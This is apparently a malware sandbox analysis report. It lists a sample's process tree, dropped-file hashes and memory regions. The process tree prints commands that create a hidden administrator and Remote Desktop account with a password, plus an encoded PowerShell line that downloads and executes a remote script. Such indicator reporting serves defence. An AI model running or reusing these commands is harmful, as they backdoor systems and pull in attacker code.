C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc TNC1opdG1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc TNC1opdG2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc TNC1opdG3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\77DB.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\77DB.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmpMD5
13ac54264370cb57c7acd4650b2c3cb7
SHA195c8f746c1c6ee355efda8300d98e911ea560f02
SHA256e6e46df8317369c5c9043667e44a9f2935eebd0e29ec402a1d5ffbb2d335b761
SHA512ee1d2486ca81ed1f50b032a018ef0da34e9216a881b6348d524e8540d361117097975c81cf28fc8a98a178429ff1befb8db64930928d80dfe0403a59cd68fbe7
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.dllMD5
6aa9a969be09d1c14af1e43fccd7b140
SHA1a2dbda03573463f7d121c5e029e55ec549d2de6e
SHA25650c6f81c852855da9c75400c50bfb130beae7e894f2e9493f852e62a83f5373d
SHA512599e9153523603a6ddf83c4444d14c915fe6ecf92bbdadf59455c1faefaedb805882ae2790e411ba4b2f5b8139c460cd3a068a23f3d62c5af15cd24fb1c6e0d2
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMPMD5
177bb42e83d266676071c801655f7634
SHA13c864e403526990e060c537343abbdfc8446a795
SHA2562e04902d46abbfe26c1706458c72d629e74ef62422f9a0c8b42987a80e96399e
SHA5125835834417f05bd50623697fed83b6e39a5b59c5981e5c8e1106e518c387b04ab136b8f9e7933a7a7c28b24f4833b195767170149250cbf5a8c114a3b6f2225a
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdlineMD5
e247e0ddb829103d544a5dabcb4d45c4
SHA12e2cb6ab320048c9f47b750aa60e40854e3bd1ed
SHA25626b3a7e2221a2ff618f1585e8566da75b35bf6589669ae3dd4f03e0c6a76d3e2
SHA51282b11f3b7a3f81d3f32fc1d98fe4602f86cd21c1117a1dead58eb8365c7e7669a871531c36f2b8856d89dda20870e422a1e5a679c07eefa43bba94e903c53b6d
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/372-261-0x0000000000000000-mapping.dmp
-
memory/372-281-0x0000021F21AE3000-0x0000021F21AE5000-memory.dmpFilesize
8KB
-
memory/372-279-0x0000021F21AE0000-0x0000021F21AE2000-memory.dmpFilesize
8KB
-
memory/372-282-0x0000021F21AE6000-0x0000021F21AE8000-memory.dmpFilesize
8KB
-
memory/372-312-0x0000021F21AE8000-0x0000021F21AEA000-memory.dmpFilesize
8KB
-
memory/380-372-0x0000000000000000-mapping.dmp
-
memory/508-387-0x0000000000000000-mapping.dmp
-
memory/716-369-0x0000000000000000-mapping.dmp
-
memory/948-373-0x0000000000000000-mapping.dmp
-
memory/1304-379-0x0000000000000000-mapping.dmp
-
memory/1504-385-0x0000000000000000-mapping.dmp
-
memory/1504-324-0x0000000000000000-mapping.dmp
-
memory/1640-253-0x0000012EC1FE6000-0x0000012EC1FE8000-memory.dmpFilesize
8KB
-
memory/1640-214-0x0000000000000000-mapping.dmp
-
memory/1640-252-0x0000012EC1FE3000-0x0000012EC1FE5000-memory.dmpFilesize
8KB
-
memory/1640-250-0x0000012EC1FE0000-0x0000012EC1FE2000-memory.dmpFilesize
8KB
-
memory/1676-145-0x0000000000000000-mapping.dmp
-
memory/1740-378-0x0000000000000000-mapping.dmp
-
memory/1756-129-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-162-0x00000190F4820000-0x00000190F4821000-memory.dmpFilesize
4KB
-
memory/1756-141-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-139-0x00000190F1473000-0x00000190F1475000-memory.dmpFilesize
8KB
-
memory/1756-152-0x00000190F3330000-0x00000190F3331000-memory.dmpFilesize
4KB
-
memory/1756-138-0x00000190F1470000-0x00000190F1472000-memory.dmpFilesize
8KB
-
memory/1756-154-0x00000190F1476000-0x00000190F1478000-memory.dmpFilesize
8KB
-
memory/1756-157-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-158-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-160-0x00000190F1478000-0x00000190F1479000-memory.dmpFilesize
4KB
-
memory/1756-161-0x00000190F4490000-0x00000190F4491000-memory.dmpFilesize
4KB
-
memory/1756-128-0x0000000000000000-mapping.dmp
-
memory/1756-137-0x00000190F3EF0000-0x00000190F3EF1000-memory.dmpFilesize
4KB
-
memory/1756-130-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-131-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-136-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-135-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-134-0x00000190F2E80000-0x00000190F2E81000-memory.dmpFilesize
4KB
-
memory/1756-133-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1756-132-0x00000190F1450000-0x00000190F1452000-memory.dmpFilesize
8KB
-
memory/1952-148-0x0000000000000000-mapping.dmp
-
memory/2264-367-0x0000000000000000-mapping.dmp
-
memory/2284-325-0x0000000000000000-mapping.dmp
-
memory/2284-461-0x0000000000000000-mapping.dmp
-
memory/2364-371-0x0000000000000000-mapping.dmp
-
memory/2556-366-0x0000000000000000-mapping.dmp
-
memory/2772-119-0x0000000000000000-mapping.dmp
-
memory/2772-122-0x00000208FB240000-0x00000208FB63F000-memory.dmpFilesize
4.0MB
-
memory/2772-124-0x00000208FAE20000-0x00000208FAE22000-memory.dmpFilesize
8KB
-
memory/2772-125-0x00000208FAE23000-0x00000208FAE25000-memory.dmpFilesize
8KB
-
memory/2772-127-0x00000208FAE26000-0x00000208FAE27000-memory.dmpFilesize
4KB
-
memory/2772-126-0x00000208FAE25000-0x00000208FAE26000-memory.dmpFilesize
4KB
-
memory/2780-388-0x0000000000000000-mapping.dmp
-
memory/2816-376-0x0000000000000000-mapping.dmp
-
memory/2852-171-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-206-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-176-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-174-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-173-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-186-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-172-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-170-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-177-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-207-0x00000235B77D6000-0x00000235B77D8000-memory.dmpFilesize
8KB
-
memory/2852-180-0x00000235B77D3000-0x00000235B77D5000-memory.dmpFilesize
8KB
-
memory/2852-179-0x00000235B77D0000-0x00000235B77D2000-memory.dmpFilesize
8KB
-
memory/2852-183-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-169-0x0000000000000000-mapping.dmp
-
memory/2852-182-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-185-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-181-0x00000235B5F60000-0x00000235B5F62000-memory.dmpFilesize
8KB
-
memory/2852-248-0x00000235B77D8000-0x00000235B77DA000-memory.dmpFilesize
8KB
-
memory/2988-363-0x0000000000000000-mapping.dmp
-
memory/2996-362-0x0000000000000000-mapping.dmp
-
memory/3012-384-0x0000000000000000-mapping.dmp
-
memory/3012-323-0x0000000000000000-mapping.dmp
-
memory/3036-118-0x0000000000DE0000-0x0000000000DF6000-memory.dmpFilesize
88KB
-
memory/3180-381-0x0000000000000000-mapping.dmp
-
memory/3192-391-0x0000000000000000-mapping.dmp
-
memory/3192-403-0x00000207320D0000-0x00000207320D2000-memory.dmpFilesize
8KB
-
memory/3192-407-0x00000207320D6000-0x00000207320D8000-memory.dmpFilesize
8KB
-
memory/3192-404-0x00000207320D3000-0x00000207320D5000-memory.dmpFilesize
8KB
-
memory/3192-433-0x00000207320D8000-0x00000207320D9000-memory.dmpFilesize
4KB
-
memory/3428-390-0x0000000000000000-mapping.dmp
-
memory/3544-380-0x0000000000000000-mapping.dmp
-
memory/3648-115-0x0000000000030000-0x0000000000038000-memory.dmpFilesize
32KB
-
memory/3648-117-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3648-116-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/3744-382-0x0000000000000000-mapping.dmp
-
memory/3808-386-0x0000000000000000-mapping.dmp
-
memory/3812-389-0x0000000000000000-mapping.dmp
-
memory/3868-383-0x0000000000000000-mapping.dmp
-
memory/3984-460-0x0000000000000000-mapping.dmp
-
memory/4024-377-0x0000000000000000-mapping.dmp
-
memory/4040-370-0x0000000000000000-mapping.dmp
-
memory/4076-368-0x0000000000000000-mapping.dmp